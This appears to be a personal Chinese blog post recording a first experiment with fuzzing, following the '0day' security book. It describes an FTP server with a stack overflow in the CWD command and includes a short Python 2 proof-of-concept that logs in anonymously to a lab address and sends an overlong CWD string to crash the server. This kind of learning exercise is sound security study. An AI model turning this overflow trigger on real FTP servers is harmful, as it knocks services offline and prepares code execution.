0day安全之fuzz初探

最近和一些巨巨聊天 聊到了fuzz 

听说比较著名的 fuzz工具是 谷歌的afl  

现在还是跟着 0day书上自己先玩玩

FTP fuzz

首先 环境 winxp sp2   sp3 我试了 确实不行,,,,

然后装上之后按照 0day书上设置一下就ok了

然后 看一下成功截图

通过这个实验。。感觉到了fuzz的方便之处    也大概明白了fuzz的功能。

就是  可以快速的找到 漏洞点 然后去发现 挖掘 。,    

感觉0day下面的东西更好玩  等到明天分析一波 

扫描二维码关注公众号,回复: 8960291 查看本文章

然后下面的就是一个比较好玩的 ftp漏洞  主要是cwd的长度验证有问题

导致了可以栈溢出 

利用方法的话 也是很简单 直接栈溢出  jmp esp  shellcode 一把梭就可以了

#!/usr/bin/env python2
 
import re
import socket,sys


def ftp_server(ip,port):
    print(ip,port)
    target  = ip
    port = port
    recv_len=1024
    buffer='a'*272
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        connect=s.connect((target ,port))
        print("[*]connect success!")
    except:
        print("[!]connect fail!")
        sys.exit(0)

    s.recv(1024)
    s.send('USER anonymous\r\n')

    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)

    print("[*] send !!!!!")

    s.send('CWD ' + buffer + '\r\n')

    try:
        recv_s=s.recv(1024)
        print recv_s
        print("fail!")

    except:
        print('ok')




if __name__ =="__main__":
    ftp_server("192.168.159.131",21)

通过这次的学习 对fuzz 有了较为浅显的认识

等 忙完这段时间的比赛 然后去看看 windows内核里面的东西

发布了313 篇原创文章 · 获赞 44 · 访问量 6万+

猜你喜欢

转载自blog.csdn.net/qq_41071646/article/details/100167941